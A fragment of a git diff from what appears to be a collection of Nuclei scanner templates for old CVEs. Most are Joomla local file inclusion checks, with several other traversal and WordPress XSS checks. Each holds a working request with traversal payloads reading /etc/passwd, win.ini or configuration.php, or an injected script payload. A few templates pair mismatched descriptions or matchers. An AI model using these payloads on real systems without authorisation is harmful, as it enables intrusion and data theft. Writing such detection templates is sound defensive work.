remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. - reference: | - - https://www.exploit-db.com/exploits/11625 - - https://www.cvedetails.com/cve/CVE-2010-1540 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1540 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/06 diff --git a/poc/cve/cve-2010-1657-1761.yaml b/poc/cve/cve-2010-1657-1761.yaml deleted file mode 100644 index b3bc8509e7..0000000000 --- a/poc/cve/cve-2010-1657-1761.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1657 - -info: - name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12428 - - https://www.cvedetails.com/cve/CVE-2010-1657 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2010-1658-1765.yaml b/poc/cve/cve-2010-1658-1765.yaml new file mode 100644 index 0000000000..a6c6045216 --- /dev/null +++ b/poc/cve/cve-2010-1658-1765.yaml @@ -0,0 +1,28 @@ +id: CVE-2010-1658 + +info: + name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12427 + - https://www.cvedetails.com/cve/CVE-2010-1658 + tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1658 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/27 diff --git a/poc/cve/cve-2010-1658.yaml b/poc/cve/cve-2010-1658.yaml new file mode 100644 index 0000000000..aae12dd013 --- /dev/null +++ b/poc/cve/cve-2010-1658.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1658 + +info: + name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12427 + - https://www.cvedetails.com/cve/CVE-2010-1658 + - http://www.vupen.com/english/advisories/2010/1007 + - http://secunia.com/advisories/39600 + classification: + cve-id: CVE-2010-1658 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/27 diff --git a/poc/cve/cve-2010-1659-1773.yaml b/poc/cve/cve-2010-1659-1773.yaml deleted file mode 100644 index 52761705bc..0000000000 --- a/poc/cve/cve-2010-1659-1773.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1659 -info: - name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12426 - - https://nvd.nist.gov/vuln/detail/CVE-2010-1659 - - http://www.securityfocus.com/bid/39739 - - http://www.exploit-db.com/exploits/12426 - classification: - cve-id: CVE-2010-1659 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/poc/cve/cve-2010-1714-1779.yaml b/poc/cve/cve-2010-1714-1779.yaml new file mode 100644 index 0000000000..1dacc59f33 --- /dev/null +++ b/poc/cve/cve-2010-1714-1779.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1714 + +info: + name: Joomla! Component Arcade Games 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12168 + - https://www.cvedetails.com/cve/CVE-2010-1714 + - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt + - http://secunia.com/advisories/39413 + classification: + cve-id: CVE-2010-1714 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/poc/cve/cve-2010-1715.yaml b/poc/cve/cve-2010-1715.yaml deleted file mode 100644 index 54a29f73dd..0000000000 --- a/poc/cve/cve-2010-1715.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1715 - -info: - name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12174 - - https://www.cvedetails.com/cve/CVE-2010-1715 - - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - - http://www.osvdb.org/63659 - classification: - cve-id: CVE-2010-1715 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/cve/cve-2010-1717-1789.yaml b/poc/cve/cve-2010-1717-1789.yaml deleted file mode 100644 index 2f8f991b93..0000000000 --- a/poc/cve/cve-2010-1717-1789.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1717 - -info: - name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12291 - - https://www.cvedetails.com/cve/CVE-2010-1717 - - http://web.archive.org/web/20140805095004/http://secunia.com/advisories/39526/ - - http://www.vupen.com/english/advisories/2010/0924 - classification: - cve-id: CVE-2010-1717 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/01 diff --git a/poc/cve/cve-2010-1718.yaml b/poc/cve/cve-2010-1718.yaml deleted file mode 100644 index 6be07b8c31..0000000000 --- a/poc/cve/cve-2010-1718.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1718 - -info: - name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12282 - - https://www.cvedetails.com/cve/CVE-2010-1718 - - http://secunia.com/advisories/39521 - - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/ - classification: - cve-id: CVE-2010-1718 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/01 diff --git a/poc/cve/cve-2010-1858.yaml b/poc/cve/cve-2010-1858.yaml deleted file mode 100644 index f25a5c5109..0000000000 --- a/poc/cve/cve-2010-1858.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1858 - -info: - name: Joomla! Component SMEStorage - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11853 - - https://www.cvedetails.com/cve/CVE-2010-1858 - - http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/ - - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1858 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/poc/cve/cve-2010-1953-1841.yaml b/poc/cve/cve-2010-1953-1841.yaml new file mode 100644 index 0000000000..106ad37fdc --- /dev/null +++ b/poc/cve/cve-2010-1953-1841.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1953 + +info: + name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12288 + - https://www.cvedetails.com/cve/CVE-2010-1953 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2010-1981.yaml b/poc/cve/cve-2010-1981.yaml new file mode 100644 index 0000000000..00c934810c --- /dev/null +++ b/poc/cve/cve-2010-1981.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-1981 + +info: + name: Joomla! Component Fabrik 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12087 + - https://www.cvedetails.com/cve/CVE-2010-1981 + - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt + - http://www.exploit-db.com/exploits/12087 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1981 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-1982.yaml b/poc/cve/cve-2010-1982.yaml new file mode 100644 index 0000000000..4f2ab61d04 --- /dev/null +++ b/poc/cve/cve-2010-1982.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-1982 + +info: + name: Joomla! Component JA Voice 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12121 + - https://www.cvedetails.com/cve/CVE-2010-1982 + - http://secunia.com/advisories/39202 + - http://web.archive.org/web/20210121195400/https://www.securityfocus.com/bid/39343/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-2682-1960.yaml b/poc/cve/cve-2010-2682-1960.yaml new file mode 100644 index 0000000000..c719e57407 --- /dev/null +++ b/poc/cve/cve-2010-2682-1960.yaml @@ -0,0 +1,32 @@ +id: CVE-2010-2682 + +info: + name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. + reference: + - https://www.exploit-db.com/exploits/14017 + - https://www.cvedetails.com/cve/CVE-2010-2682 + tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-2682 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-2920.yaml b/poc/cve/cve-2010-2920.yaml deleted file mode 100644 index 67f0851855..0000000000 --- a/poc/cve/cve-2010-2920.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2010-2920 - -info: - name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12120 - - https://www.cvedetails.com/cve/CVE-2010-2920 - - http://www.vupen.com/english/advisories/2010/1844 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2920 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-3203-1987.yaml b/poc/cve/cve-2010-3203-1987.yaml new file mode 100644 index 0000000000..82386d99c8 --- /dev/null +++ b/poc/cve/cve-2010-3203-1987.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-3203 + +info: + name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval + author: daffainfo + severity: high + description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: + - https://www.exploit-db.com/exploits/14845 + - https://www.cvedetails.com/cve/CVE-2010-3203 + - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/ + - http://www.exploit-db.com/exploits/14845 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3203 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-3203.yaml b/poc/cve/cve-2010-3203.yaml new file mode 100644 index 0000000000..17042d0b25 --- /dev/null +++ b/poc/cve/cve-2010-3203.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-3203 + +info: + name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval + author: daffainfo + severity: high + description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: + - https://www.exploit-db.com/exploits/14845 + - https://www.cvedetails.com/cve/CVE-2010-3203 + - http://secunia.com/advisories/41187 + - http://www.exploit-db.com/exploits/14845 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3203 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-4239-1997.yaml b/poc/cve/cve-2010-4239-1997.yaml deleted file mode 100644 index cf068ecd83..0000000000 --- a/poc/cve/cve-2010-4239-1997.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-4239 -info: - name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion - author: 0x_akoko - severity: high - description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion - reference: - - https://www.cvedetails.com/cve/CVE-2010-4239 - - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2010-4239 - cwe-id: CWE-20 - tags: cve,cve2010,tikiwiki,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" - stop-at-first-match: true - matchers: - - type: word - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - part: body diff --git a/poc/cve/cve-2010-4617.yaml b/poc/cve/cve-2010-4617.yaml deleted file mode 100644 index f172f0e5d8..0000000000 --- a/poc/cve/cve-2010-4617.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2010-4617 - -info: - name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/15791 - - https://www.cvedetails.com/cve/CVE-2010-4617 - - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4617 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-5028-2025.yaml b/poc/cve/cve-2010-5028-2025.yaml new file mode 100644 index 0000000000..9c09573b07 --- /dev/null +++ b/poc/cve/cve-2010-5028-2025.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-5028 +info: + name: Joomla! Component JE Job 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + reference: + - https://www.exploit-db.com/exploits/12601 + - https://www.cvedetails.com/cve/CVE-2010-5028 + - http://www.vupen.com/english/advisories/2010/1269 + - http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-5028 + tags: cve,cve2010,joomla,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/poc/cve/cve-2010-5278-2030.yaml b/poc/cve/cve-2010-5278-2030.yaml new file mode 100644 index 0000000000..2df290ba03 --- /dev/null +++ b/poc/cve/cve-2010-5278-2030.yaml @@ -0,0 +1,32 @@ +id: CVE-2010-5278 +info: + name: MODx manager - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. + reference: + - https://www.exploit-db.com/exploits/34788 + - https://www.cvedetails.com/cve/CVE-2010-5278 + - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt + - http://secunia.com/advisories/41638 + classification: + cve-id: CVE-2010-5278 + tags: cve,cve2010,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body + +# Enhanced by mp on 2022/03/30 diff --git a/poc/cve/cve-2010-5278.yaml b/poc/cve/cve-2010-5278.yaml new file mode 100644 index 0000000000..7bc17d9f24 --- /dev/null +++ b/poc/cve/cve-2010-5278.yaml @@ -0,0 +1,35 @@ +id: CVE-2010-5278 + +info: + name: MODx manager - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. + reference: + - https://www.exploit-db.com/exploits/34788 + - https://www.cvedetails.com/cve/CVE-2010-5278 + - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt + - http://secunia.com/advisories/41638 + classification: + cve-id: CVE-2010-5278 + tags: cve,cve2010,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body + +# Enhanced by mp on 2022/03/30 diff --git a/poc/cve/cve-2011-2744.yaml b/poc/cve/cve-2011-2744.yaml deleted file mode 100644 index c303e15090..0000000000 --- a/poc/cve/cve-2011-2744.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2011-2744 - -info: - name: Chyrp 2.x - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. - reference: - - https://www.exploit-db.com/exploits/35945 - - https://www.cvedetails.com/cve/CVE-2011-2744 - - http://www.openwall.com/lists/oss-security/2011/07/13/6 - - http://secunia.com/advisories/45184 - classification: - cve-id: CVE-2011-2744 - tags: cve,cve2011,lfi,chyrp - -requests: - - method: GET - path: - - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/poc/cve/cve-2011-3315-2059.yaml b/poc/cve/cve-2011-3315-2059.yaml deleted file mode 100644 index 855379ffba..0000000000 --- a/poc/cve/cve-2011-3315-2059.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2011-3315 - -info: - name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. - reference: https://www.exploit-db.com/exploits/36256 - tags: cve,cve2011,lfi,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2011-4926.yaml b/poc/cve/cve-2011-4926.yaml new file mode 100644 index 0000000000..a5cfb54cf7 --- /dev/null +++ b/poc/cve/cve-2011-4926.yaml @@ -0,0 +1,51 @@ +id: CVE-2011-4926 + +info: + name: Adminimize 1.7.22 - Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + remediation: | + Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 + - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 + - http://www.openwall.com/lists/oss-security/2012/01/10/9 + - http://wordpress.org/extend/plugins/adminimize/changelog/ + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2011-4926 + cwe-id: CWE-79 + epss-score: 0.01792 + epss-percentile: 0.86706 + cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: bueltge + product: adminimize + google-query: inurl:"/wp-content/plugins/adminimize/" + tags: cve,cve2011,wordpress,xss,wp-plugin + +http: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a00463044022074b143fc402b0cb088d3000103ddd8072955cf969ab5969c9dd24c014962b58202203d3b2b0c012567fd976de1950cd4c3efcbe50edd832ada1542ce0283984d4384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2011-5179.yaml b/poc/cve/cve-2011-5179.yaml deleted file mode 100644 index e104139d85..0000000000 --- a/poc/cve/cve-2011-5179.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2011-5179 - -info: - name: Skysa App Bar 1.04 - Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. - remediation: | - Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-5179 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486 - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N - cvss-score: 4.3 - cve-id: CVE-2011-5179 - cwe-id: CWE-79 - epss-score: 0.00232 - epss-percentile: 0.61177 - cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: skysa - product: skysa_app_bar_integration_plugin - google-query: inurl:"/wp-content/plugins/skysa-official/" - tags: cve,cve2011,wordpress,xss,wp-plugin - -http: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a00473045022067011df53d660d9f6e1623e4af7eef9730c0a2a58862db762b68ec72b569eb4e022100c240fa22371e7748774cf97615ad01bafc5ba32caa888b38b0ae17e7cd42599c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2012-0896-2132.yaml b/poc/cve/cve-2012-0896-2132.yaml deleted file mode 100644 index a862bf8c9a..0000000000 --- a/poc/cve/cve-2012-0896-2132.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2012-0896 - -info: - name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access - author: daffainfo - severity: high - description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. - reference: - - https://packetstormsecurity.com/files/108631/ - - https://www.cvedetails.com/cve/CVE-2012-0896 - tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal - classification: - cve-id: CVE-2012-0896 - -requests: - - method: GET - path: - - 